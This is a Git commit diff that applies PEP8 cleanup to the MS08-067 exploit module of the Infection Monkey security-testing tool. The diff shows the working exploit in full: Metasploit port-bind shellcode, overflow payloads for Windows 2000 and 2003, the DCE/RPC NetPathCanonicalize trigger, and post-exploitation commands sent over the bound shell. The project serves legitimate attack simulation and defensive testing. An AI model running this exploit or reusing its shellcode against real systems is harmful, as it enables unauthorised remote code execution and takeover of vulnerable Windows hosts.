p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

If already touching this file, modify it for PEP8 + better exception syntax.

This commit is contained in:
Daniel Goldberg 2017-09-28 14:17:41 +03:00
parent 48ce135194
commit a27c802b11
1 changed files with 32 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

64
chaos_monkey/exploit/win_ms08_067.py
View File

@ -9,34 +9,35 @@
import sys import sys
import time import time
import socket import socket
from enum import IntEnum
from logging import getLogger from logging import getLogger
from model.host import VictimHost
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from enum import IntEnum
from . import HostExploiter
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
from model.host import VictimHost
from network import SMBFinger from network import SMBFinger
from network.tools import check_port_tcp
from tools import build_monkey_commandline from tools import build_monkey_commandline
from . import HostExploiter
try: try:
from impacket import smb from impacket import smb
from impacket import uuid from impacket import uuid
#from impacket.dcerpc import dcerpc # from impacket.dcerpc import dcerpc
from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5 import transport
from impacket.smbconnection import SessionError as SessionError1 from impacket.smbconnection import SessionError as SessionError1
from impacket.smb import SessionError as SessionError2 from impacket.smb import SessionError as SessionError2
from impacket.smb3 import SessionError as SessionError3 from impacket.smb3 import SessionError as SessionError3
except ImportError, exc: except ImportError as exc:
print str(exc) print str(exc)
print 'Install the following library to make this script work' print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1) sys.exit(1)
LOG = getLogger(__name__) LOG = getLogger(__name__)
# Portbind shellcode from metasploit; Binds port to TCP port 4444 # Portbind shellcode from metasploit; Binds port to TCP port 4444
SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
SHELLCODE += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" SHELLCODE += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
@ -61,8 +62,7 @@ SHELLCODE += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
SHELLCODE += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" SHELLCODE += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
SHELLCODE += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" SHELLCODE += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
SHELLCODE += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" SHELLCODE += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
# Payload for Windows 2000 target # Payload for Windows 2000 target
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
@ -76,7 +76,7 @@ PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43'
PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43'
PAYLOAD_2000 += '\xeb\xcc' PAYLOAD_2000 += '\xeb\xcc'
PAYLOAD_2000 += '\x00\x00' PAYLOAD_2000 += '\x00\x00'
# Payload for Windows 2003[SP2] target # Payload for Windows 2003[SP2] target
PAYLOAD_2003 = '\x41\x00\x5c\x00' PAYLOAD_2003 = '\x41\x00\x5c\x00'
PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00' PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
@ -95,11 +95,11 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
class WindowsVersion(IntEnum): class WindowsVersion(IntEnum):
Windows2000 = 1 Windows2000 = 1
Windows2003_SP2 = 2 Windows2003_SP2 = 2
class SRVSVC_Exploit(object): class SRVSVC_Exploit(object):
TELNET_PORT = 4444 TELNET_PORT = 4444
def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445): def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
self._port = port self._port = port
self._target = target_addr self._target = target_addr
@ -110,33 +110,33 @@ class SRVSVC_Exploit(object):
The port on which the Telnet service will listen. The port on which the Telnet service will listen.
""" """
return SRVSVC_Exploit.TELNET_PORT return SRVSVC_Exploit.TELNET_PORT
def start(self): def start(self):
"""start() -> socket """start() -> socket
Exploit the target machine and return a socket connected to it's Exploit the target machine and return a socket connected to it's
listening Telnet service. listening Telnet service.
""" """
target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
LOG.debug("Initiating exploit connection (%s)", target_rpc_name) LOG.debug("Initiating exploit connection (%s)", target_rpc_name)
self._trans = transport.DCERPCTransportFactory(target_rpc_name) self._trans = transport.DCERPCTransportFactory(target_rpc_name)
self._trans.connect() self._trans.connect()
LOG.debug("Connected to %s", target_rpc_name) LOG.debug("Connected to %s", target_rpc_name)
self._dce = self._trans.DCERPC_class(self._trans) self._dce = self._trans.DCERPC_class(self._trans)
self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
dce_packet = self._build_dce_packet() dce_packet = self._build_dce_packet()
self._dce.call(0x1f, dce_packet) #0x1f (or 31)- NetPathCanonicalize Operation self._dce.call(0x1f, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation
LOG.debug("Exploit sent to %s successfully...", self._target) LOG.debug("Exploit sent to %s successfully...", self._target)
LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port()) LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port())
sock = socket.socket() sock = socket.socket()
sock.connect((self._target, self.get_telnet_port())) sock.connect((self._target, self.get_telnet_port()))
return sock return sock
@ -162,7 +162,7 @@ class SRVSVC_Exploit(object):
dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00' dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00'
dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00' dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00'
dce_packet += '\x01\x00\x00\x00' dce_packet += '\x01\x00\x00\x00'
return dce_packet return dce_packet
@ -186,7 +186,7 @@ class Ms08_067_Exploiter(HostExploiter):
smb_finger = SMBFinger() smb_finger = SMBFinger()
if smb_finger.get_host_fingerprint(host): if smb_finger.get_host_fingerprint(host):
return host.os.get('type') in self._target_os_type and \ return host.os.get('type') in self._target_os_type and \
host.os.get('version') in self._windows_versions.keys() host.os.get('version') in self._windows_versions.keys()
return False return False
def exploit_host(self, host, depth=-1, src_path=None): def exploit_host(self, host, depth=-1, src_path=None):
@ -218,7 +218,7 @@ class Ms08_067_Exploiter(HostExploiter):
LOG.debug("Exploited into %r using MS08-067", host) LOG.debug("Exploited into %r using MS08-067", host)
exploited = True exploited = True
break break
except Exception, exc: except Exception as exc:
LOG.debug("Error exploiting victim %r: (%s)", host, exc) LOG.debug("Error exploiting victim %r: (%s)", host, exc)
continue continue
@ -256,15 +256,15 @@ class Ms08_067_Exploiter(HostExploiter):
build_monkey_commandline(host, depth - 1) build_monkey_commandline(host, depth - 1)
try: try:
sock.send("start %s\r\n" % (cmdline, )) sock.send("start %s\r\n" % (cmdline,))
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add, )) sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
except Exception, exc: except Exception as exc:
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc) LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc)
return False return False
finally: finally:
try: try:
sock.close() sock.close()
except: except socket.error:
pass pass
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",